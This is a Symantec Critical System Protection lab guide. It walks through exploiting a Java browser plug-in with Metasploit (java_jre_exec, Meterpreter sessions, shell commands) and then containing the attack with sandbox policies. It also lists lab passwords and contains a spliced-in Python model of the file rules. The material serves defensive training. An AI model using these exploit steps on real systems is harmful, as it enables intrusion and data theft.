IS L06 Protect Servers and Defend Against APTs with Symantec Critical System Protection

Description
At the end of this lab, you should be able to discover how to harness the power and capabilities of Symantec Critical System Protection. This lab will demonstrate how CSP can be used to protect your critical servers against APTs.

APTs take advantage of vulnerabilities found in systems. These vulnerabilities are often ones that have not yet been identified and patched by software vendors. Once a system has been compromised, the cybercriminal will use that system to attack other systems in the environment. CSP offers prevention policies that provide OS and application lockdown. The policies can be used to control what applications can run on the system as well as govern their good behavior. Prevention policies can also be used to control network access to and from a system.

In this lab we'll do things a little differently and use CSP as a Java Zero-Day exploit debugger, to learn how CSP works and how these Zero-Day exploits compromise the system. We'll use Backtrack and Metasploit to do the penetration testing part.
1. We'll construct a basic policy that can be used to uncover the tasks these exploits perform behind the scenes. We also allow the exploit to happen first. You'll be using a system with the CSP agent installed to browse a compromised web server that executes the exploit in your browser plug-in.
2. We'll start to add limitations and observe how these affect compromised applications running in sandboxes.
3. We'll block this Zero-Day exploit and all of its future variants for good.

Lab flow
Understand how APTs take advantage of vulnerable systems
Protect a server from exploit attacks
Monitor for zero-day attacks against a system
Lock down intellectual property
Prevent unauthorized applications from getting installed
Notes
A brief presentation will introduce this lab session and discuss key concepts. The lab will be directed and provide you with step-by-step walkthroughs of key features. Thank you for coming to our lab session.

Lab content
Lab Orientation... 3
Constructing the initial policy... 7
Deploying the policy to CSP-Agent-01 server... 12
Testing the policy before using the penetration testing tools... 15
Using penetration testing tool to execute Java Zero-Day exploit in CSP system... 18
Blocking known and unknown APTs getting shell... 27
Using CSP as Exploit Debugger... 32
2 of 40
Lab Orientation
In this phase we'll learn how to navigate in the CSP manager and observe the places needed later. Boot your CSP Manager 5.2.9, Java Zero-Day and Backtrack VMs now if you have not done so already.

Systems available for you:
CSP Manager 5.2.9 VM: IP address 192.168.10.10. Will show up in the CSP manager as CSP-Manager.
Java Zero-Day VM: IP address 192.168.10.9. Will show up in the CSP manager as CSP-Agent-01.
Penetration testing tool Backtrack VM: IP address 192.168.10.250.

Login accounts and passwords for the systems:
CSP Manager server: administrator / Symc4now!
Java Zero-Day server: administrator / Symc4now!
Backtrack penetration testing tool: root / toor

Login accounts and passwords for the applications:
CSP Manager: symadmin / Symc4now!
Access the CSP manager
Click the management console icon on the desktop. Log in to the CSP Manager 5.2.9 system and then log in to the CSP console with username symadmin and password Symc4now!
Click Assets and the Prevention view. Browse around and get familiar with your assets. You will be assigning policies to these assets later. CSP-Agent-01 is your system containing the Java Zero-Day vulnerable software.
Click the Policies tab and Prevention policies. Browse around and get familiar with your policies. You'll be using these policies later with CSP-Agent-01.
Click Home and the Prevention view. Click CSP-Agent-01. These are the events coming from the CSP-Agent-01 system. You may sort the events as you wish. We'll be using these views later to complete the lab.
Constructing the initial policy
In this phase we'll construct a simple policy that will block access to a single folder even though the system has been fully compromised, over the network or locally from the console. We'll observe how the sandboxing limitations apply even though the application has been broken inside of its sandbox.
Go to the Policy tab.
Browse under the Symantec folder.
Right-click sym_win_protection_strict_sbp (the one with minimum agent version 5.2.9) and click Copy Policy.
Rename the policy to Java_sym_win_protection_strict_sbp by right-clicking it.
Open the policy by double-clicking it, or right-click it and select Edit Policy.
Click the Agent Event Viewer row and allow all users to run the Agent Event Viewer. In production environments you would usually select a restricted user or group only for this option.
Click OK.
Select Global Policy Options from the policy front page.
Enable Inbound host list and click Edit.
Click Add and add the 192.168.10.0/24 network.
Repeat this network addition for the Outbound host list.
Note that for the moment we'll intentionally leave the firewall half open by not setting the outbound default to deny.
Click General Settings.
Click File Rules. Enable the No-Access resource list and add the resource path D:\creditcardinfo\*
Observe that you have very granular ways to filter these in a CSP policy.
Click Apply to submit the changes.
Select Update Revision.
Go back to the policy home page.
Click Changes From Base and observe what you have changed in the policy.
Finally click OK.
Deploying the policy to CSP-Agent-01 server
In this phase we'll deploy the initial policy to the agent.
Right-click the policy that you just created and select Apply Policy. The Apply Policy Wizard will open.
Double-click the policy and select CSP Agents.
Click Next.
Select Take the new option settings.
Select Finish.
Go to the Asset view. Under Prevention and CSP Agents you should see a small red flag indicating that the agent is taking the policy.
If you select the green refresh button in the upper right corner of the screen, the flag should disappear soon.
Testing the policy before using the penetration testing tools
In this phase we'll observe some of the limitations that the policy applies.
Log on to CSP-Agent-01 with the account administrator and the password Symc4now!
Select Start -> Run and type cmd.
Type whoami to verify that you are the system administrator.
Use Explorer to browse to the d:\creditcardinfo folder and try to open cards.txt.
Under Start -> All Programs browse to Symantec Critical System Protection and open the Event Viewer. Observe the red warnings generated while you tried to open the file. Click the entries to get more information and see that the full record of what happened is available to you.
Note that the Process Set is the sandbox in which this event happened. It is important to understand that everything in the system runs in sandboxes. These sandboxes have Behavior Control Descriptions attached, so we can still control what the applications are doing while they execute.
Leave the Event Viewer open and browse to the c:\temp folder.
Right-click and create a new txt file.
Try to rename it with an .exe extension and observe the Event Viewer information.
Using penetration testing tool to execute Java Zero-Day exploit in CSP system
In this phase we'll use Metasploit to penetrate the system. Metasploit will create a malicious web server that sends an exploit to your web browser, and the exploit will compromise your Java plug-in. We'll use CSP to monitor what is happening and allow the Java Zero-Day exploit to happen, leading to the system being compromised. We'll observe how the sandboxing limitations still apply even though the application has been compromised inside of its sandbox.
Start the Backtrack5r3 VM if you have not already started it. Log in as root with the password toor. After login, type startx.
NOTE! VMware cloning may change the network adapter settings, so double-check that your Backtrack network is working properly by pinging 192.168.10.10, which is your CSP manager. If you are planning to install your own Backtrack later, it is helpful to know that you can set up a fixed IP.
If the ping is not working, open a terminal by clicking the terminal icon on the top bar and type:
o ip addr
Observe the output; you should see the 192.168.10.255 IP address. If you are not seeing 192.168.10.250, you need to edit the /etc/network/interfaces file. Most likely eth0 has been changed to eth1 or similar. From the top bar select Places and Computer, browse to the interfaces file and change the settings as needed.
In the terminal type:
o /etc/init.d/networking restart
Check that your Backtrack network is working by pinging 192.168.10.10, your CSP manager.
Start Metasploit by double-clicking the msfconsole icon on the desktop. Note that the console usually takes some time to load.
When you have the Metasploit console open, type:
o use exploit/multi/browser/java_jre_exec
Note that you may use Tab to auto-complete the line.
o Press Enter.
Type:
o show options
to study the options available for this exploit. We'll set some basic options for it:
o set SRVHOST 192.168.10.250
o set SRVPORT 80
o set URIPATH jre
o show options
Verify that the defaults have been changed.
Type:
o exploit
to start the malicious web server.
Move back to the CSP-Agent-01 server.
Open the Event Viewer if it is not open already.
Clear the view by selecting View from the top pane and then Clear.
Open Internet Explorer via the Start menu.
Observe which sandbox Internet Explorer is assigned to.
Browse to the attacking web page by typing http://192.168.10.250/jre into the URL bar. Observe that in the Event Viewer there is a lot of activity being generated; also note which sandbox Java is assigned to by default. Try to find the event where you can see metasploit.payload. Also note that we are allowing this exploit to happen so we can study it later.
Move back to the Metasploit console. You should see something like this:
Observe the number of the session opened by looking at the row "Meterpreter session xx opened". Attach yourself to this session by typing sessions -i [session number you are seeing], for example:
o sessions -i 1
You have now successfully breached the box. CSP is monitoring the situation while we have not configured anything special in the policy. Java has been compromised but it will stay inside of the sandbox. Let's test this! Type:
o shell
o whoami
o d:
o cd creditcardinfo
o dir
Observe that even though the application has been compromised and you have gained administrative access to the system, the CSP limitations still apply.
Move to the CSP Manager and click Home, Prevention and CSP-Agent-01 to see the events from the agent system.
In this example we created a simple policy that allowed the exploit to happen but contained it, with minimal limitations, inside of the default interactive application sandbox. You also learned that penetration testing or hacking is not rocket science and the tools are widely and freely available for anyone to download and use. We used a free distribution of Backtrack that contains a huge amount of security testing tools. Backtrack can be downloaded from http://www.backtrack-linux.org/.
Blocking known and unknown APTs getting shell access
In this phase we'll modify the previous policy and block Meterpreter, or any other penetration testing tool, from gaining shell access. We'll be modifying the default interactive application sandbox (int_stdpriv_ps) so that no known or unknown type of vulnerability can breach your server. Most operating system components and applications are executed under this int_stdpriv_ps sandbox (sometimes referred to as the Default Sandbox). It is a good place to prevent this type of attack, although it is already well confined. Naturally you can make exceptions for applications and users if needed; please observe during this section what kind of options are available to you while creating limitations.
The power of CSP is that you really do not need to know in advance what the bad things are. Those will be handled properly by the default sandbox. The only thing you need to know is what the attackers may be after: mainly your confidential information, some operating system components like the shell, your bespoke applications, and so on. The result of this part of the lab is that you'll have comprehensive protection against all known or unknown targeted attacks and APTs. We'll also observe how these sandboxing limitations still apply even though the application has been broken inside of its sandbox and some foothold has been gained. Let's proceed!
Move back to your CSP manager VM. Open up your Java policy. Java was assigned by default to int_stdpriv_ps, which is the default sandbox for all unknown interactive applications. Let's change some of the settings around that sandbox.
Click Process Sets on the policy home page and spend some time browsing through these built-in sandboxes.
Click Edit in Default Interactive Program Options at the bottom of the page.
Navigate to File Rules and add a No-Access entry for *\cmd.exe
Save the policy and assign it to the CSP-Agent-01 server. You may select Reapply the policy this time and take the new settings.
Move to the Backtrack VM and restart your attack using the instructions given previously: just close the terminal and start Metasploit again, entering the same information as before.
Move to the CSP-Agent-01 server, close IE and clear the Event Viewer events. Browse to http://192.168.10.250/jre
Move back to the Backtrack image and hit Enter.
Notice that the application is breaking again and your session is established. This is normal. Attach yourself to the newly established session with:
o sessions -i 1
Type:
o shell
Observe that Meterpreter is unable to give you the shell ("Operation Failed" message) because it cannot break through the sandbox and its limitations.
Browse the related events in the CSP manager and the agent Event Viewer. Can you open a shell on CSP-Agent-01 as administrator by using the Start menu and running CMD?
At the end, close Internet Explorer on the CSP-Agent-01 VM and the Metasploit console on the Backtrack VM.
In this section we created a simple policy that prevents current and future attacks against the Windows shell. The logic is identical if you use UNIX or Linux type platforms. We also controlled the administrators' access to the command prompt, since in this case we assumed they could be malicious administrators. CSP offers granular options to control everything that runs on the system, and this was just a brief demo of that.
Using CSP as Exploit Debugger
In this phase we'll modify the previous policy and build a custom sandbox for the Java engine; by default it is executed under the default sandbox. This way we can granularly control the Java engine's behavior. In this exercise we are interested in closely monitoring how Java behaves when it is compromised, and in learning how targeted attacks penetrate your networks.
Before proceeding, reboot the Java Zero-Day exploit VM (the VM you used to browse to the vulnerable web page), since it may still have Meterpreter running.
Move back to the CSP manager and open the Java policy you created earlier.
Click Process Sets on the policy home page.
Move under Default Interactive Program Options and modify the previous File Rule: remove the *\cmd.exe entry that you added previously.
On the policy home page click My Custom Programs.
Click the green plus sign to add a custom control.
Type Java in the display name box and the same in the identifier name box. Leave "This program is Interactive" as is, since Java is an interactive application.
Select Finish.
Edit the newly created sandbox by selecting Edit.
Observe the default settings of this sandbox.
Select the "Specify Interactive Programs with Custom privileges" check box and select Edit.
Select Add and add the path C:\Program Files (x86)\java\*
This will reroute all interactive applications started under this path into this sandbox.
Select File Rules.
Add the following limitations to the No-Access resource list:
o C:\Users\*\AppData\Local\Temp\*
o c:\windows\*
You can use system variables if you wish.
Move back to My Custom Programs and disable prevention for this sandbox by flipping the green slider to red.
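The following is an added illustration (not part of the lab guide, and not Symantec's policy engine) that models the file rules built in this lab: the policy-level No-Access rule for D:\creditcardinfo\*, the *\cmd.exe rule in the default interactive sandbox, and the custom Java sandbox with its Temp and c:\windows\* rules switched to monitoring only. The matching semantics, the sample program paths and the "log" decision for a sandbox with prevention disabled are assumptions made for the model.

```python
import fnmatch
from dataclasses import dataclass, field

# Constructed model of the lab's prevention policy (assumed semantics for illustration,
# not Symantec's policy engine). A sandbox is a process set with its own No-Access list;
# a program is routed to a custom set when its path matches one of that set's program
# patterns, otherwise it runs in the default interactive sandbox. User privilege is
# deliberately absent: rules bind to the process set, so an administrator is confined too.

@dataclass
class ProcessSet:
    name: str
    no_access: list = field(default_factory=list)  # denied resource patterns
    programs: list = field(default_factory=list)   # program paths routed here
    prevention: bool = True                        # False = log only (slider set to red)

def _match(pattern, path):
    # Windows paths: case-insensitive, and '*' also crosses backslashes (fnmatch semantics)
    return fnmatch.fnmatchcase(path.lower().replace("/", "\\"), pattern.lower())

@dataclass
class Policy:
    global_no_access: list      # policy-level File Rules, enforced in every sandbox
    process_sets: dict          # name -> ProcessSet
    default_set: str = "int_stdpriv_ps"

    def sandbox_for(self, program_path):
        for ps in self.process_sets.values():
            if any(_match(p, program_path) for p in ps.programs):
                return ps.name
        return self.default_set

    def check_file_access(self, program_path, resource):
        """Return (sandbox, decision, matched_rule); decision is allow, deny or log."""
        ps = self.process_sets[self.sandbox_for(program_path)]
        for rule in self.global_no_access + ps.no_access:
            if _match(rule, resource):
                return ps.name, ("deny" if ps.prevention else "log"), rule
        return ps.name, "allow", None

def lab_policy(phase):
    """Policy after lab phase 1 (initial), 2 (cmd.exe blocked in default sandbox) or 3 (Java sandbox, log only)."""
    default = ProcessSet("int_stdpriv_ps")
    sets = {default.name: default}
    if phase == 2:
        default.no_access.append(r"*\cmd.exe")
    if phase == 3:   # the cmd.exe rule is removed again before the Java sandbox is built
        sets["Java"] = ProcessSet("Java", programs=[r"C:\Program Files (x86)\java\*"],
                                  no_access=[r"C:\Users\*\AppData\Local\Temp\*",
                                             r"c:\windows\*"], prevention=False)
    return Policy(global_no_access=[r"D:\creditcardinfo\*"], process_sets=sets)

# Constructed sample paths: the Java plug-in binary and resources a compromised plug-in touches
JAVA_EXE = r"C:\Program Files (x86)\Java\jre7\bin\java.exe"
CMD_EXE = r"C:\Windows\System32\cmd.exe"
```

Calling lab_policy(2).check_file_access(JAVA_EXE, CMD_EXE) yields a deny from int_stdpriv_ps regardless of who is logged on, which is the behaviour the "Operation Failed" message in the lab reflects; with phase 3 the same access is only logged, which is what makes the custom sandbox usable as a debugger.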
Save the policy and reapply it with these new settings.
Move to the Backtrack VM and restart the attack with the previously given instructions.
Move to the CSP-Agent-01 server and again browse to the web page that is breaking Java. You should see a lot of events in the Event Viewer.
Move back to the Backtrack VM and attach yourself to the Meterpreter session with:
o sessions -i [session number you are seeing]
Type first ps and then shell.
Move back to the CSP manager and go to Monitors, Events, Prevention.
Let's examine some of the events generated by this attack and try to learn how things break behind the scenes.
Locate the temp file created by the exploit.
Locate the event caused by you asking Meterpreter to give you a shell.
Can you locate the event where hidden applications are moved onto your system via an encrypted channel and are only present in memory?
Generally, applications, users and services have far too much access to the operating system by default, and these permissions allow them to be used as tools by hackers and malicious insiders to gain access to your system. With CSP you can effectively stop that via policy.
End of Lab - Thank you!